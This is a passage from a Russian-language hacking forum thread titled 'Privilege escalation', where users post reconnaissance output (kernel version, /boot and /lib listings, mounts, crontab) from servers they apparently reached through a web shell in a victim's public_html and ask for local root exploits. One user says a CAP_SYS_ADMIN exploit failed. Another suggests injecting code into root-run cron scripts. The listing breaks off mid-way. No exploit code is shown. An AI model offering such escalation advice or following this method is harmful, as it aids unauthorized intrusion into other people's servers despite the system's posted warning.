Повышение прав [задай вопрос - получи ответ]

morgan black · 10 Jan 2012

uname -a

Linux 2.6.35.7-grsec #1 SMP Sat Nov 20 02:14:33 CST 2010 x86_64 x86_64 x86_64 GNU/Linux
Click to expand...

ls -la /boot

total 33543
drwxr-xr-x 4 root root 1024 May 11 2011 .
drwxr-xr-x 33 root root 4096 Dec 28 08:25 ..
-rw-r--r-- 1 root root 1188555 Apr 1 2009 System.map-2.6.18-128.1.6.el5
-rw-r--r-- 1 root root 1188481 Jan 21 2009 System.map-2.6.18-128.el5
-rw-r--r-- 1 root root 1664845 Dec 30 2009 System.map-2.6.31.9-grsec
-rw-r--r-- 1 root root 1852342 Nov 20 2010 System.map-2.6.35.7-grsec
-rwxr--r-- 1 root root 6144 Nov 6 2009 aquota.user
lrwxrwxrwx 1 root root 2 Nov 6 2009 boot -> ..
-rw-r--r-- 1 root root 64998 Apr 1 2009 config-2.6.18-128.1.6.el5
-rw-r--r-- 1 root root 64994 Jan 21 2009 config-2.6.18-128.el5
-rw-r--r-- 1 root root 47720 Dec 30 2009 config-2.6.31.9-grsec
-rw-r--r-- 1 root root 55462 Nov 20 2010 config-2.6.35.7-grsec
drwxr-xr-x 2 root root 1024 Nov 25 2010 grub
-rw------- 1 root root 2650442 Apr 20 2009 initrd-2.6.18-128.1.6.el5.img
-rw------- 1 root root 2602997 Apr 20 2009 initrd-2.6.18-128.el5.img
-rw------- 1 root root 2275460 Jan 26 2010 initrd-2.6.31.9grsec.img
-rw------- 1 root root 2317251 Nov 25 2010 initrd-2.6.35.7-grsec.img
drwx------ 2 root root 12288 Apr 20 2009 lost+found
-rw-r--r-- 1 root root 80032 Mar 16 2009 message
-rwxr--r-- 1 root root 32 Nov 6 2009 quota.user
-rw-r--r-- 1 root root 102182 Apr 1 2009 symvers-2.6.18-128.1.6.el5.gz
-rw-r--r-- 1 root root 102182 Jan 21 2009 symvers-2.6.18-128.el5.gz
-rwxr-xr-x 1 root root 3586662 Dec 30 2009 vmlinux-2.6.31.9-grsec.bz2
-rwxr-xr-x 1 root root 3838217 Nov 20 2010 vmlinux-2.6.35.7-grsec.bz2
-rw-r--r-- 1 root root 1888636 Apr 1 2009 vmlinuz-2.6.18-128.1.6.el5
-rw-r--r-- 1 root root 1889308 Jan 21 2009 vmlinuz-2.6.18-128.el5
-rw-r--r-- 1 root root 3237824 Dec 30 2009 vmlinuz-2.6.31.9-grsec
-rw-r--r-- 1 root root 3453904 Nov 20 2010 vmlinuz-2.6.35.7-grsec
Click to expand...

ls -la --full-time /lib/lib*

-rwxr-xr-x 1 root root 7664 2011-11-28 11:28:47.000000000 -0600 /lib/libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root 22 2011-11-28 21:53:42.000000000 -0600 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root 16704 2011-11-28 11:28:47.000000000 -0600 /lib/libSegFault.so
lrwxrwxrwx 1 root root 15 2010-05-14 22:01:27.000000000 -0500 /lib/libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x 1 root root 24144 2010-01-26 16:57:13.000000000 -0600 /lib/libacl.so.1.1.0
-rwxr-xr-x 1 root root 14128 2011-11-28 11:28:47.000000000 -0600 /lib/libanl-2.5.so
lrwxrwxrwx 1 root root 13 2011-11-28 21:53:42.000000000 -0600 /lib/libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root 18 2010-01-13 13:27:54.000000000 -0600 /lib/libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x 1 root root 907328 2009-01-20 21:47:23.000000000 -0600 /lib/libasound.so.2.0.0
lrwxrwxrwx 1 root root 16 2009-11-06 22:46:05.000000000 -0600 /lib/libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x 1 root root 14296 2007-01-05 23:12:05.000000000 -0600 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2011-04-08 22:01:34.000000000 -0500 /lib/libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x 1 root root 95740 2011-03-05 19:22:55.000000000 -0600 /lib/libaudit.so.0.0.0
lrwxrwxrwx 1 root root 19 2011-04-08 22:01:34.000000000 -0500 /lib/libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x 1 root root 54832 2011-03-05 19:22:55.000000000 -0600 /lib/libauparse.so.0.0.0
lrwxrwxrwx 1 root root 15 2011-09-13 21:58:26.000000000 -0500 /lib/libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root 36708 2011-07-22 00:04:15.000000000 -0500 /lib/libblkid.so.1.0
-rwxr-xr-x 1 root root 1693812 2011-11-28 11:28:47.000000000 -0600 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-11-28 21:53:42.000000000 -0600 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 2009-11-06 22:46:06.000000000 -0600 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 2007-03-14 13:15:10.000000000 -0500 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 2011-11-28 11:28:47.000000000 -0600 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2011-11-28 21:53:42.000000000 -0600 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2011-09-13 21:58:26.000000000 -0500 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 2011-07-22 00:04:15.000000000 -0500 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 2011-11-28 11:28:47.000000000 -0600 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2011-11-28 21:53:42.000000000 -0600 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 2011-08-13 20:43:56.000000000 -0500 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 2009-11-06 22:46:11.000000000 -0600 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 2011-09-13 21:58:27.000000000 -0500 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root 838860 2007-01-06 23:37:48.000000000 -0600 /lib/libdb-4.1.so
-rwxr-xr-x 1 root root 934132 2007-01-06 23:37:48.000000000 -0600 /lib/libdb-4.2.so
-rwxr-xr-x 1 root root 1010204 2010-07-12 11:11:02.000000000 -0500 /lib/libdb-4.3.so
-rwxr-xr-x 1 root root 905704 2007-01-06 23:37:48.000000000 -0600 /lib/libdb_cxx-4.1.so
-rwxr-xr-x 1 root root 1019472 2007-01-06 23:37:48.000000000 -0600 /lib/libdb_cxx-4.2.so
lrwxrwxrwx 1 root root 18 2011-09-13 21:59:35.000000000 -0500 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 253392 2011-08-11 12:33:53.000000000 -0500 /lib/libdbus-1.so.3.4.0
-r--r--r-- 1 root root 42988 2011-07-22 00:43:06.000000000 -0500 /lib/libdevmapper-event.a
lrwxrwxrwx 1 root root 26 2011-09-13 21:58:26.000000000 -0500 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 17548 2011-07-22 00:43:10.000000000 -0500 /lib/libdevmapper-event.so.1.02
-r--r--r-- 1 root root 469522 2011-07-22 00:43:01.000000000 -0500 /lib/libdevmapper.a
lrwxrwxrwx 1 root root 20 2011-09-13 21:58:26.000000000 -0500 /lib/libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root 151964 2011-07-22 00:43:10.000000000 -0500 /lib/libdevmapper.so.1.02
-rwxr-xr-x 1 root root 20668 2011-11-28 11:28:47.000000000 -0600 /lib/libdl-2.5.so
lrwxrwxrwx 1 root root 12 2011-11-28 21:53:42.000000000 -0600 /lib/libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root 13 2011-09-13 21:58:26.000000000 -0500 /lib/libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 20192 2011-07-22 00:04:15.000000000 -0500 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 17 2010-09-12 21:53:30.000000000 -0500 /lib/libexpat.so.0 -> libexpat.so.0.5.0
-rwxr-xr-x 1 root root 133184 2010-09-07 10:37:44.000000000 -0500 /lib/libexpat.so.0.5.0
lrwxrwxrwx 1 root root 16 2011-09-13 21:58:26.000000000 -0500 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 113860 2011-07-22 00:04:15.000000000 -0500 /lib/libext2fs.so.2.4
-rwxr-xr-x 1 root root 45192 2011-07-22 03:11:54.000000000 -0500 /lib/libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 28 2011-09-13 21:58:29.000000000 -0500 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 23 2009-11-06 22:46:06.000000000 -0600 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 644472 2009-03-24 20:52:17.000000000 -0500 /lib/libglib-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-11-06 22:46:06.000000000 -0600 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 11396 2009-03-24 20:52:17.000000000 -0500 /lib/libgmodule-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-11-06 22:46:11.000000000 -0600 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 259128 2009-03-24 20:52:17.000000000 -0500 /lib/libgobject-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-11-06 22:46:05.000000000 -0600 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 14660 2009-03-24 20:52:17.000000000 -0500 /lib/libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 27964 2007-03-14 22:26:22.000000000 -0500 /lib/libiw.so.28
-rwxr-xr-x 1 root root 6404 2007-01-06 01:57:38.000000000 -0600 /lib/libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2009-11-06 22:46:05.000000000 -0600 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
-rwxr-xr-x 1 root root 216544 2011-11-28 11:28:47.000000000 -0600 /lib/libm-2.5.so
lrwxrwxrwx 1 root root 11 2011-11-28 21:53:42.000000000 -0600 /lib/libm.so.6 -> libm-2.5.so
-rwxr-xr-x 1 root root 109740 2011-11-28 11:28:47.000000000 -0600 /lib/libnsl-2.5.so
lrwxrwxrwx 1 root root 13 2011-11-28 21:53:42.000000000 -0600 /lib/libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x 1 root root 36416 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_compat-2.5.so
lrwxrwxrwx 1 root root 20 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x 1 root root 825028 2010-05-13 06:02:40.000000000 -0500 /lib/libnss_db-2.2.so
lrwxrwxrwx 1 root root 16 2010-05-14 22:01:30.000000000 -0500 /lib/libnss_db.so.2 -> libnss_db-2.2.so
-rwxr-xr-x 1 root root 21948 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_dns-2.5.so
lrwxrwxrwx 1 root root 17 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x 1 root root 50848 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_files-2.5.so
lrwxrwxrwx 1 root root 19 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x 1 root root 22764 2011-11-28 11:28:47.000000000 -0600 /lib/libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root 20 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root 3208544 2011-10-31 08:18:04.000000000 -0500 /lib/libnss_ldap-2.5.so
lrwxrwxrwx 1 root root 18 2011-11-01 22:51:48.000000000 -0500 /lib/libnss_ldap.so.2 -> libnss_ldap-2.5.so
-rwxr-xr-x 1 root root 46536 2011-11-28 11:28:48.000000000 -0600 /lib/libnss_nis-2.5.so
lrwxrwxrwx 1 root root 17 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
-rwxr-xr-x 1 root root 55804 2011-11-28 11:28:48.000000000 -0600 /lib/libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 21 2011-11-28 21:53:42.000000000 -0600 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 16 2010-11-01 21:54:26.000000000 -0500 /lib/libpam.so.0 -> libpam.so.0.81.5
-rwxr-xr-x 1 root root 43020 2010-11-01 16:32:19.000000000 -0500 /lib/libpam.so.0.81.5
lrwxrwxrwx 1 root root 21 2010-11-01 21:54:26.000000000 -0500 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
-rwxr-xr-x 1 root root 8624 2010-11-01 16:32:19.000000000 -0500 /lib/libpam_misc.so.0.81.2
lrwxrwxrwx 1 root root 17 2010-11-01 21:54:26.000000000 -0500 /lib/libpamc.so.0 -> libpamc.so.0.81.0
-rwxr-xr-x 1 root root 9868 2010-11-01 16:32:19.000000000 -0500 /lib/libpamc.so.0.81.0
-rwxr-xr-x 1 root root 137908 2011-11-28 11:28:48.000000000 -0600 /lib/libpthread-2.5.so
lrwxrwxrwx 1 root root 17 2011-11-28 21:53:42.000000000 -0600 /lib/libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x 1 root root 80636 2011-11-28 11:28:48.000000000 -0600 /lib/libresolv-2.5.so
lrwxrwxrwx 1 root root 16 2011-11-28 21:53:42.000000000 -0600 /lib/libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x 1 root root 48156 2011-11-28 11:28:48.000000000 -0600 /lib/librt-2.5.so
lrwxrwxrwx 1 root root 12 2011-11-28 21:53:42.000000000 -0600 /lib/librt.so.1 -> librt-2.5.so
-rwxr-xr-x 1 root root 91892 2011-03-05 22:51:56.000000000 -0600 /lib/libselinux.so.1
-rwxr-xr-x 1 root root 243928 2010-03-31 03:26:18.000000000 -0500 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 12 2011-09-13 21:58:26.000000000 -0500 /lib/libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 19008 2011-07-22 00:04:15.000000000 -0500 /lib/libss.so.2.0
-rwxr-xr-x 1 root root 291556 2011-08-13 20:43:56.000000000 -0500 /lib/libssl.so.0.9.8e
lrwxrwxrwx 1 root root 11 2009-11-06 22:46:06.000000000 -0600 /lib/libssl.so.4 -> libssl.so.6
lrwxrwxrwx 1 root root 16 2011-09-13 21:58:27.000000000 -0500 /lib/libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx 1 root root 19 2009-11-06 22:46:05.000000000 -0600 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 11636 2007-01-06 07:01:17.000000000 -0600 /lib/libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 33852 2011-11-28 11:28:48.000000000 -0600 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2011-11-28 21:53:42.000000000 -0600 /lib/libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 13492 2011-11-28 11:28:48.000000000 -0600 /lib/libutil-2.5.so
lrwxrwxrwx 1 root root 14 2011-11-28 21:53:42.000000000 -0600 /lib/libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root 14 2011-09-13 21:58:26.000000000 -0500 /lib/libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root 14472 2011-07-22 00:04:15.000000000 -0500 /lib/libuuid.so.1.2
lrwxrwxrwx 1 root root 22 2011-11-14 21:51:38.000000000 -0600 /lib/libvolume_id.so.0 -> libvolume_id.so.0.66.0
-rwxr-xr-x 1 root root 37032 2011-11-14 04:43:31.000000000 -0600 /lib/libvolume_id.so.0.66.0
lrwxrwxrwx 1 root root 16 2009-11-06 15:17:36.000000000 -0600 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root 31344 2009-09-21 17:37:30.000000000 -0500 /lib/libwrap.so.0.7.6
lrwxrwxrwx 1 root root 13 2011-09-13 21:59:07.000000000 -0500 /lib/libz.so -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2011-09-13 21:58:26.000000000 -0500 /lib/libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 75120 2011-05-11 05:57:17.000000000 -0500 /lib/libz.so.1.2.3
Click to expand...

mount

/dev/sda5 on / type ext3 (rw,noatime,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
none on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
/dev/sda1 on /boot type ext2 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
69.175.104.234:/backup/cl65 on /backup type nfs (rw,nfsvers=3,tcp,hard,intr,rsize=32768,wsize=32768,addr=69.175.104.234)
Click to expand...

df -h

Filesystem Size Used Avail Use% Mounted on
/dev/sda5 878G 708G 126G 85% /
none 4.0G 0 4.0G 0% /dev/shm
/dev/sda1 130M 35M 95M 27% /boot
/usr/tmpDSK 2.0G 619M 1.3G 34% /tmp
69.175.104.234:/backup/cl65
2.7T 2.3T 310G 89% /backup
Click to expand...

cat /etc/issue

This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.
Click to expand...

cat /etc/crontab

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
Click to expand...

run-parts

01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
* * * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.php > /dev/null
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.daily.php > /dev/null
Click to expand...

cat /proc/version

Linux version 2.6.35.7-grsec ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Sat Nov 20 02:14:33 CST 2010
Click to expand...

cat /proc/sys/vm/mmap_min_addr

65536
Click to expand...

pwd

/home/rentino1/public_html/img/weather
Click to expand...

Пробовал Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) - не помогло. Некоторые другое эксплоиты не компилировались из-за ошибок в исходнике.
Что можете ещё посоветовать под это ядро?

Expl0ited · 10 Jan 2012

morgan black, ну тут я вижу вариант, если есть права на редактирование

* * * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.php > /dev/null
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.daily.php > /dev/null
Click to expand...

можешь туда вписать свой код, и выполнить его от рута.

morgan black · 10 Jan 2012

Expl0ited said:

morgan black, ну тут я вижу вариант, если есть права на редактирование

можешь туда вписать свой код, и выполнить его от рута.
Click to expand...

Увы, прав на запись нет Больше ничего нельзя сделать?

Expl0ited · 10 Jan 2012

morgan black said:

Увы, прав на запись нет Больше ничего нельзя сделать?
Click to expand...

Нет.

gl0w · 11 Jan 2012

sh-3.1$ uname -a
Linux ********* 2.6.18-028stab070.10 #1 SMP Thu Oct 21 13:44:25 MSD 2010 i686 GNU/Linux

sh-3.1$ ls -la /boot
total 8
drwxr-xr-x 2 root root 4096 Sep 29 2008 .
drwxr-xr-x 21 root root 4096 Jan 8 12:29 ..

sh-3.1$ ls -la --full-time /lib/lib*
-rw-r--r-- 1 root root 5448 2009-01-17 12:58:51.000000000 +0100 /lib/libBrokenLocale-2.3.6.so
lrwxrwxrwx 1 root root 24 2009-06-28 21:55:57.000000000 +0200 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.3.6.so
-rw-r--r-- 1 root root 13652 2009-01-17 12:58:52.000000000 +0100 /lib/libSegFault.so
lrwxrwxrwx 1 root root 15 2006-07-21 01:40:39.000000000 +0200 /lib/libacl.so.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root 22156 2006-07-21 01:40:44.000000000 +0200 /lib/libacl.so.1.1.0
-rw-r--r-- 1 root root 9868 2009-01-17 12:58:51.000000000 +0100 /lib/libanl-2.3.6.so
lrwxrwxrwx 1 root root 15 2009-06-28 21:55:57.000000000 +0200 /lib/libanl.so.1 -> libanl-2.3.6.so
lrwxrwxrwx 1 root root 15 2005-03-19 03:26:50.000000000 +0100 /lib/libatm.so.1 -> libatm.so.1.0.0
-rw-r--r-- 1 root root 34768 2005-03-19 03:26:50.000000000 +0100 /lib/libatm.so.1.0.0
lrwxrwxrwx 1 root root 16 2006-03-28 07:25:02.000000000 +0200 /lib/libattr.so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root 12840 2006-03-28 07:25:06.000000000 +0200 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root 15 2007-12-06 20:57:45.000000000 +0100 /lib/libblkid.so.1 -> libblkid.so.1.0
-rw-r--r-- 1 root root 32248 2007-12-06 20:57:51.000000000 +0100 /lib/libblkid.so.1.0
lrwxrwxrwx 1 root root 15 2006-08-25 19:20:30.000000000 +0200 /lib/libbz2.so.1 -> libbz2.so.1.0.3
lrwxrwxrwx 1 root root 15 2006-08-25 19:20:30.000000000 +0200 /lib/libbz2.so.1.0 -> libbz2.so.1.0.3
-rw-r--r-- 1 root root 66200 2006-08-25 19:20:30.000000000 +0200 /lib/libbz2.so.1.0.3
-rwxr-xr-x 1 root root 1147548 2009-01-17 12:58:52.000000000 +0100 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 2009-06-28 21:55:57.000000000 +0200 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 2004-04-14 00:10:43.000000000 +0200 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 2004-04-14 00:10:45.000000000 +0200 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 2006-09-05 18:26:18.000000000 +0200 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 2006-09-05 18:26:20.000000000 +0200 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 2009-01-17 12:58:52.000000000 +0100 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 2009-06-28 21:55:57.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 2007-12-06 20:57:44.000000000 +0100 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 2007-12-06 20:57:50.000000000 +0100 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 2006-09-05 18:26:18.000000000 +0200 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 2006-09-05 18:26:20.000000000 +0200 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 2009-01-17 12:58:52.000000000 +0100 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 2009-06-28 21:55:57.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 2006-09-05 18:26:18.000000000 +0200 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 2006-09-05 18:26:20.000000000 +0200 /lib/libctutils.so.0.0.0
lrwxrwxrwx 1 root root 15 2006-02-14 23:06:32.000000000 +0100 /lib/libdb.so.2 -> libdb1-2.2.5.so
-rw-r--r-- 1 root root 55052 2006-02-14 23:06:32.000000000 +0100 /lib/libdb1-2.2.5.so
lrwxrwxrwx 1 root root 15 2006-02-14 23:06:32.000000000 +0100 /lib/libdb1.so.2 -> libdb1-2.2.5.so
-rw-r--r-- 1 root root 65332 2006-08-09 00:39:02.000000000 +0200 /lib/libdevmapper.so.1.02
-rw-r--r-- 1 root root 9592 2009-01-17 12:58:52.000000000 +0100 /lib/libdl-2.3.6.so
lrwxrwxrwx 1 root root 14 2009-06-28 21:55:57.000000000 +0200 /lib/libdl.so.2 -> libdl-2.3.6.so
lrwxrwxrwx 1 root root 13 2007-12-06 20:57:45.000000000 +0100 /lib/libe2p.so.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root 19132 2007-12-06 20:57:51.000000000 +0100 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2007-12-06 20:57:45.000000000 +0100 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 102892 2007-12-06 20:57:51.000000000 +0100 /lib/libext2fs.so.2.4
-rw-r--r-- 1 root root 41096 2006-12-10 15:45:12.000000000 +0100 /lib/libgcc_s.so.1
lrwxrwxrwx 1 root root 17 2006-12-19 16:51:31.000000000 +0100 /lib/libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 26444 2006-12-19 16:51:33.000000000 +0100 /lib/libhistory.so.5.2
-rw-r--r-- 1 root root 141040 2009-01-17 12:58:52.000000000 +0100 /lib/libm-2.3.6.so
lrwxrwxrwx 1 root root 13 2009-06-28 21:55:57.000000000 +0200 /lib/libm.so.6 -> libm-2.3.6.so
-rw-r--r-- 1 root root 13644 2009-01-17 12:58:52.000000000 +0100 /lib/libmemusage.so
lrwxrwxrwx 1 root root 17 2006-10-19 13:02:19.000000000 +0200 /lib/libncurses.so.5 -> libncurses.so.5.5
-rw-r--r-- 1 root root 263040 2006-10-19 13:02:31.000000000 +0200 /lib/libncurses.so.5.5
lrwxrwxrwx 1 root root 18 2006-10-19 13:02:21.000000000 +0200 /lib/libncursesw.so.5 -> libncursesw.so.5.5
-rw-r--r-- 1 root root 308288 2006-10-19 13:02:32.000000000 +0200 /lib/libncursesw.so.5.5
-rw-r--r-- 1 root root 72452 2009-01-17 12:58:52.000000000 +0100 /lib/libnsl-2.3.6.so
lrwxrwxrwx 1 root root 15 2009-06-28 21:55:57.000000000 +0200 /lib/libnsl.so.1 -> libnsl-2.3.6.so
-rw-r--r-- 1 root root 26332 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_compat-2.3.6.so
lrwxrwxrwx 1 root root 22 2009-06-28 21:55:57.000000000 +0200 /lib/libnss_compat.so.2 -> libnss_compat-2.3.6.so
-rw-r--r-- 1 root root 17840 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_dns-2.3.6.so
lrwxrwxrwx 1 root root 19 2009-06-28 21:55:57.000000000 +0200 /lib/libnss_dns.so.2 -> libnss_dns-2.3.6.so
-rw-r--r-- 1 root root 34276 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_files-2.3.6.so
lrwxrwxrwx 1 root root 21 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_files.so.2 -> libnss_files-2.3.6.so
-rw-r--r-- 1 root root 17856 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_hesiod-2.3.6.so
lrwxrwxrwx 1 root root 22 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.3.6.so
-rw-r--r-- 1 root root 76216 2007-12-08 19:44:17.000000000 +0100 /lib/libnss_ldap-2.3.6.so
lrwxrwxrwx 1 root root 20 2007-12-08 19:44:17.000000000 +0100 /lib/libnss_ldap.so.2 -> libnss_ldap-2.3.6.so
-rw-r--r-- 1 root root 34320 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_nis-2.3.6.so
lrwxrwxrwx 1 root root 19 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_nis.so.2 -> libnss_nis-2.3.6.so
-rw-r--r-- 1 root root 38340 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_nisplus-2.3.6.so
lrwxrwxrwx 1 root root 23 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.3.6.so
lrwxrwxrwx 1 root root 14 2009-06-28 21:56:33.000000000 +0200 /lib/libpam.so.0 -> libpam.so.0.79
-rw-r--r-- 1 root root 29700 2009-03-18 00:58:08.000000000 +0100 /lib/libpam.so.0.79
lrwxrwxrwx 1 root root 19 2009-06-28 21:56:33.000000000 +0200 /lib/libpam_misc.so.0 -> libpam_misc.so.0.79
-rw-r--r-- 1 root root 8264 2009-03-18 00:58:08.000000000 +0100 /lib/libpam_misc.so.0.79
lrwxrwxrwx 1 root root 15 2009-06-28 21:56:33.000000000 +0200 /lib/libpamc.so.0 -> libpamc.so.0.79
-rw-r--r-- 1 root root 9660 2009-03-18 00:58:08.000000000 +0100 /lib/libpamc.so.0.79
-rw-r--r-- 1 root root 5400 2009-01-17 12:58:52.000000000 +0100 /lib/libpcprofile.so
lrwxrwxrwx 1 root root 16 2006-08-08 02:47:49.000000000 +0200 /lib/libpopt.so.0 -> libpopt.so.0.0.0
